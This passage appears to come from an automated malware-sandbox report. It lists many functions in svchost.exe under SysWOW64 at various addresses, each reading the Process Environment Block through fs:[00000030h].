                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333208A mov eax, dword ptr fs:[00000030h]9_2_0333208A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C0F0 mov eax, dword ptr fs:[00000030h]9_2_0332C0F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033720F0 mov ecx, dword ptr fs:[00000030h]9_2_033720F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0332A0E3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033380E9 mov eax, dword ptr fs:[00000030h]9_2_033380E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B60E0 mov eax, dword ptr fs:[00000030h]9_2_033B60E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B20DE mov eax, dword ptr fs:[00000030h]9_2_033B20DE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336273C mov eax, dword ptr fs:[00000030h]9_2_0336273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336273C mov ecx, dword ptr fs:[00000030h]9_2_0336273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336273C mov eax, dword ptr fs:[00000030h]9_2_0336273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AC730 mov eax, dword ptr fs:[00000030h]9_2_033AC730
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C720 mov eax, dword ptr fs:[00000030h]9_2_0336C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C720 mov eax, dword ptr fs:[00000030h]9_2_0336C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330710 mov eax, dword ptr fs:[00000030h]9_2_03330710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03360710 mov eax, dword ptr fs:[00000030h]9_2_03360710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C700 mov eax, dword ptr fs:[00000030h]9_2_0336C700
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338770 mov eax, dword ptr fs:[00000030h]9_2_03338770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330750 mov eax, dword ptr fs:[00000030h]9_2_03330750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BE75D mov eax, dword ptr fs:[00000030h]9_2_033BE75D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372750 mov eax, dword ptr fs:[00000030h]9_2_03372750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372750 mov eax, dword ptr fs:[00000030h]9_2_03372750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B4755 mov eax, dword ptr fs:[00000030h]9_2_033B4755
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336674D mov esi, dword ptr fs:[00000030h]9_2_0336674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336674D mov eax, dword ptr fs:[00000030h]9_2_0336674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336674D mov eax, dword ptr fs:[00000030h]9_2_0336674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033307AF mov eax, dword ptr fs:[00000030h]9_2_033307AF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E47A0 mov eax, dword ptr fs:[00000030h]9_2_033E47A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D678E mov eax, dword ptr fs:[00000030h]9_2_033D678E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033347FB mov eax, dword ptr fs:[00000030h]9_2_033347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033347FB mov eax, dword ptr fs:[00000030h]9_2_033347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033527ED mov eax, dword ptr fs:[00000030h]9_2_033527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033527ED mov eax, dword ptr fs:[00000030h]9_2_033527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033527ED mov eax, dword ptr fs:[00000030h]9_2_033527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BE7E1 mov eax, dword ptr fs:[00000030h]9_2_033BE7E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333C7C0 mov eax, dword ptr fs:[00000030h]9_2_0333C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B07C3 mov eax, dword ptr fs:[00000030h]9_2_033B07C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E627 mov eax, dword ptr fs:[00000030h]9_2_0334E627
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03366620 mov eax, dword ptr fs:[00000030h]9_2_03366620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03368620 mov eax, dword ptr fs:[00000030h]9_2_03368620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333262C mov eax, dword ptr fs:[00000030h]9_2_0333262C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372619 mov eax, dword ptr fs:[00000030h]9_2_03372619
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE609 mov eax, dword ptr fs:[00000030h]9_2_033AE609
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03362674 mov eax, dword ptr fs:[00000030h]9_2_03362674
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F866E mov eax, dword ptr fs:[00000030h]9_2_033F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F866E mov eax, dword ptr fs:[00000030h]9_2_033F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A660 mov eax, dword ptr fs:[00000030h]9_2_0336A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A660 mov eax, dword ptr fs:[00000030h]9_2_0336A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334C640 mov eax, dword ptr fs:[00000030h]9_2_0334C640
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033666B0 mov eax, dword ptr fs:[00000030h]9_2_033666B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C6A6 mov eax, dword ptr fs:[00000030h]9_2_0336C6A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334690 mov eax, dword ptr fs:[00000030h]9_2_03334690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334690 mov eax, dword ptr fs:[00000030h]9_2_03334690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B06F1 mov eax, dword ptr fs:[00000030h]9_2_033B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B06F1 mov eax, dword ptr fs:[00000030h]9_2_033B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0336A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A6C7 mov eax, dword ptr fs:[00000030h]9_2_0336A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E53E mov eax, dword ptr fs:[00000030h]9_2_0335E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E53E mov eax, dword ptr fs:[00000030h]9_2_0335E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E53E mov eax, dword ptr fs:[00000030h]9_2_0335E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E53E mov eax, dword ptr fs:[00000030h]9_2_0335E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E53E mov eax, dword ptr fs:[00000030h]9_2_0335E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C6500 mov eax, dword ptr fs:[00000030h]9_2_033C6500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404500 mov eax, dword ptr fs:[00000030h]9_2_03404500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336656A mov eax, dword ptr fs:[00000030h]9_2_0336656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336656A mov eax, dword ptr fs:[00000030h]9_2_0336656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336656A mov eax, dword ptr fs:[00000030h]9_2_0336656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338550 mov eax, dword ptr fs:[00000030h]9_2_03338550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338550 mov eax, dword ptr fs:[00000030h]9_2_03338550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033545B1 mov eax, dword ptr fs:[00000030h]9_2_033545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033545B1 mov eax, dword ptr fs:[00000030h]9_2_033545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B05A7 mov eax, dword ptr fs:[00000030h]9_2_033B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B05A7 mov eax, dword ptr fs:[00000030h]9_2_033B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B05A7 mov eax, dword ptr fs:[00000030h]9_2_033B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E59C mov eax, dword ptr fs:[00000030h]9_2_0336E59C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03332582 mov eax, dword ptr fs:[00000030h]9_2_03332582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03332582 mov ecx, dword ptr fs:[00000030h]9_2_03332582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03364588 mov eax, dword ptr fs:[00000030h]9_2_03364588
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h]9_2_0335E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033325E0 mov eax, dword ptr fs:[00000030h]9_2_033325E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C5ED mov eax, dword ptr fs:[00000030h]9_2_0336C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C5ED mov eax, dword ptr fs:[00000030h]9_2_0336C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033365D0 mov eax, dword ptr fs:[00000030h]9_2_033365D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A5D0 mov eax, dword ptr fs:[00000030h]9_2_0336A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A5D0 mov eax, dword ptr fs:[00000030h]9_2_0336A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E5CF mov eax, dword ptr fs:[00000030h]9_2_0336E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E5CF mov eax, dword ptr fs:[00000030h]9_2_0336E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A430 mov eax, dword ptr fs:[00000030h]9_2_0336A430
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332E420 mov eax, dword ptr fs:[00000030h]9_2_0332E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332E420 mov eax, dword ptr fs:[00000030h]9_2_0332E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332E420 mov eax, dword ptr fs:[00000030h]9_2_0332E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C427 mov eax, dword ptr fs:[00000030h]9_2_0332C427
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h]9_2_033B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03368402 mov eax, dword ptr fs:[00000030h]9_2_03368402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03368402 mov eax, dword ptr fs:[00000030h]9_2_03368402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03368402 mov eax, dword ptr fs:[00000030h]9_2_03368402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335A470 mov eax, dword ptr fs:[00000030h]9_2_0335A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335A470 mov eax, dword ptr fs:[00000030h]9_2_0335A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335A470 mov eax, dword ptr fs:[00000030h]9_2_0335A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BC460 mov ecx, dword ptr fs:[00000030h]9_2_033BC460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EA456 mov eax, dword ptr fs:[00000030h]9_2_033EA456
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332645D mov eax, dword ptr fs:[00000030h]9_2_0332645D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335245A mov eax, dword ptr fs:[00000030h]9_2_0335245A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h]9_2_0336E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033644B0 mov ecx, dword ptr fs:[00000030h]9_2_033644B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BA4B0 mov eax, dword ptr fs:[00000030h]9_2_033BA4B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033364AB mov eax, dword ptr fs:[00000030h]9_2_033364AB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EA49A mov eax, dword ptr fs:[00000030h]9_2_033EA49A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033304E5 mov ecx, dword ptr fs:[00000030h]9_2_033304E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335EB20 mov eax, dword ptr fs:[00000030h]9_2_0335EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335EB20 mov eax, dword ptr fs:[00000030h]9_2_0335EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F8B28 mov eax, dword ptr fs:[00000030h]9_2_033F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F8B28 mov eax, dword ptr fs:[00000030h]9_2_033F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03402B57 mov eax, dword ptr fs:[00000030h]9_2_03402B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03402B57 mov eax, dword ptr fs:[00000030h]9_2_03402B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03402B57 mov eax, dword ptr fs:[00000030h]9_2_03402B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03402B57 mov eax, dword ptr fs:[00000030h]9_2_03402B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h]9_2_033AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404B00 mov eax, dword ptr fs:[00000030h]9_2_03404B00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332CB7E mov eax, dword ptr fs:[00000030h]9_2_0332CB7E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03328B50 mov eax, dword ptr fs:[00000030h]9_2_03328B50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DEB50 mov eax, dword ptr fs:[00000030h]9_2_033DEB50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E4B4B mov eax, dword ptr fs:[00000030h]9_2_033E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E4B4B mov eax, dword ptr fs:[00000030h]9_2_033E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C6B40 mov eax, dword ptr fs:[00000030h]9_2_033C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C6B40 mov eax, dword ptr fs:[00000030h]9_2_033C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FAB40 mov eax, dword ptr fs:[00000030h]9_2_033FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D8B42 mov eax, dword ptr fs:[00000030h]9_2_033D8B42
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340BBE mov eax, dword ptr fs:[00000030h]9_2_03340BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340BBE mov eax, dword ptr fs:[00000030h]9_2_03340BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E4BB0 mov eax, dword ptr fs:[00000030h]9_2_033E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E4BB0 mov eax, dword ptr fs:[00000030h]9_2_033E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338BF0 mov eax, dword ptr fs:[00000030h]9_2_03338BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338BF0 mov eax, dword ptr fs:[00000030h]9_2_03338BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338BF0 mov eax, dword ptr fs:[00000030h]9_2_03338BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335EBFC mov eax, dword ptr fs:[00000030h]9_2_0335EBFC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BCBF0 mov eax, dword ptr fs:[00000030h]9_2_033BCBF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DEBD0 mov eax, dword ptr fs:[00000030h]9_2_033DEBD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03350BCB mov eax, dword ptr fs:[00000030h]9_2_03350BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03350BCB mov eax, dword ptr fs:[00000030h]9_2_03350BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03350BCB mov eax, dword ptr fs:[00000030h]9_2_03350BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330BCD mov eax, dword ptr fs:[00000030h]9_2_03330BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330BCD mov eax, dword ptr fs:[00000030h]9_2_03330BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330BCD mov eax, dword ptr fs:[00000030h]9_2_03330BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03354A35 mov eax, dword ptr fs:[00000030h]9_2_03354A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03354A35 mov eax, dword ptr fs:[00000030h]9_2_03354A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336CA38 mov eax, dword ptr fs:[00000030h]9_2_0336CA38
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336CA24 mov eax, dword ptr fs:[00000030h]9_2_0336CA24
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335EA2E mov eax, dword ptr fs:[00000030h]9_2_0335EA2E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BCA11 mov eax, dword ptr fs:[00000030h]9_2_033BCA11
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033ACA72 mov eax, dword ptr fs:[00000030h]9_2_033ACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033ACA72 mov eax, dword ptr fs:[00000030h]9_2_033ACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336CA6F mov eax, dword ptr fs:[00000030h]9_2_0336CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336CA6F mov eax, dword ptr fs:[00000030h]9_2_0336CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336CA6F mov eax, dword ptr fs:[00000030h]9_2_0336CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DEA60 mov eax, dword ptr fs:[00000030h]9_2_033DEA60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h]9_2_03336A50
